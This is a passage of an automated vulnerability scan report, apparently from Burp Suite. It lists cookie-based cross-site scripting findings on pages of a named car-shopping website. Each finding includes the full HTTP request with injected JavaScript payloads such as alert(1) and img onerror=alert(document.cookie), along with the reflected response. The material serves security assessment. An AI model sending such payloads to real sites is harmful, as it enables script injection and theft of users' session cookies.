Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=285f6a<img%20src%3da%20onerror%3dalert(1)>f2e1e159d1b; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 500 Internal Server Error
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
server-error: true
Content-Length: 78708
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:50:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:24 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:23 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 285f6a<img src=a onerror=alert(1)>f2e1e159d1b cannot be converted to a number.
</h1>
...[SNIP]...

4.2001. http://www.autobytel.com/a.cfml [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/a.cfml

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb310"%3balert(1)//8c4641eac9a was submitted in the BDATALIST cookie. This input was echoed as cb310";alert(1)//8c4641eac9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a.cfml HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4cb310"%3balert(1)//8c4641eac9a; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23454
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:41:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:55 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/




  <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4cb310";alert(1)//8c4641eac9a";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "480B4519-BD86-5942-EC224DB8
...[SNIP]...

4.2002. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/ask-our-mechanics/my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a18bb"%3balert(1)//aa71a6423cd was submitted in the BDATALIST cookie. This input was echoed as a18bb";alert(1)//aa71a6423cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ask-our-mechanics/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4a18bb"%3balert(1)//aa71a6423cd; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:35 GMT
Content-Length: 22188
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4a18bb";alert(1)//aa71a6423cd";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "485A80FB-CB51-EEF4-287DB74D
...[SNIP]...

4.2003. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/ask-our-mechanics/my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7759"%3balert(1)//b74a61ebf4 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as c7759";alert(1)//b74a61ebf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ask-our-mechanics/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=c7759"%3balert(1)//b74a61ebf4; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:57 GMT
Content-Length: 22187
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:57 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";

           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "c7759";alert(1)//b74a61ebf4||";

           s.prop14 = "my garage page|ask-our-mechanics : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Se
...[SNIP]...

4.2004. http://www.autobytel.com/auto-insurance-quotes.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/auto-insurance-quotes.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df78"%3balert(1)//5201a4e556e was submitted in the BDATALIST cookie. This input was echoed as 8df78";alert(1)//5201a4e556e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /auto-insurance-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c48df78"%3balert(1)//5201a4e556e; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 33670
Expires: Mon, 24 Jan 2011 23:47:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:56 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:56 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:56 GMT;path=/
Set-Cookie: PV_CT=3;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c48df78";alert(1)//5201a4e556e";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48427175-FA79-9560-9E7F5FF7
...[SNIP]...

4.2005. http://www.autobytel.com/auto-insurance-quotes.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/auto-insurance-quotes.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd74"%3balert(1)//973f381dc13 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as fcd74";alert(1)//973f381dc13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /auto-insurance-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=fcd74"%3balert(1)//973f381dc13; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:14 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:14 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
//s.prop7 = "finins|";

           //s.prop9 = "finins|Search Engine Optimization Project|13148";
           s.prop10 = "finins|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "fcd74";alert(1)//973f381dc13||";

           s.prop14 = "auto insurance quotes page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "finins||||sky|
...[SNIP]...

4.2006. http://www.autobytel.com/car-advice.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-advice.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f42cf"%3balert(1)//2f1bdfd3bb8 was submitted in the BDATALIST cookie. This input was echoed as f42cf";alert(1)//2f1bdfd3bb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-advice.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4f42cf"%3balert(1)//2f1bdfd3bb8; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:31 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:49:31 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43784

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4f42cf";alert(1)//2f1bdfd3bb8";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4850C1E8-0F75-AD47-69BCECD4
...[SNIP]...

4.2007. http://www.autobytel.com/car-advice.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-advice.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16d60"%3balert(1)//0c306d2f8a8 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 16d60";alert(1)//0c306d2f8a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-advice.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=16d60"%3balert(1)//0c306d2f8a8; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:55:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43784

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "16d60";alert(1)//0c306d2f8a8||";

           s.prop14 = "car advice page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||sky|ban|Searc
...[SNIP]...

4.2008. http://www.autobytel.com/car-blog.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-blog.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d07d"%3balert(1)//c4d2bfc31c0 was submitted in the BDATALIST cookie. This input was echoed as 8d07d";alert(1)//c4d2bfc31c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-blog.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c48d07d"%3balert(1)//c4d2bfc31c0; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:45 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:49:45 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62071

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c48d07d";alert(1)//c4d2bfc31c0";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "485310ED-DBE7-D3F5-FA1DCEE4
...[SNIP]...

4.2009. http://www.autobytel.com/car-blog.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-blog.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb21a"%3balert(1)//f4f0cb5b4cd was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as cb21a";alert(1)//f4f0cb5b4cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /car-blog.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=cb21a"%3balert(1)//f4f0cb5b4cd; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62071

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";

           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "cb21a";alert(1)//f4f0cb5b4cd||";

           s.prop14 = "research|blog : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||sky|ban|Search
...[SNIP]...

4.2010. http://www.autobytel.com/car-dealers.htm [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/car-dealers.htm

Issue detail

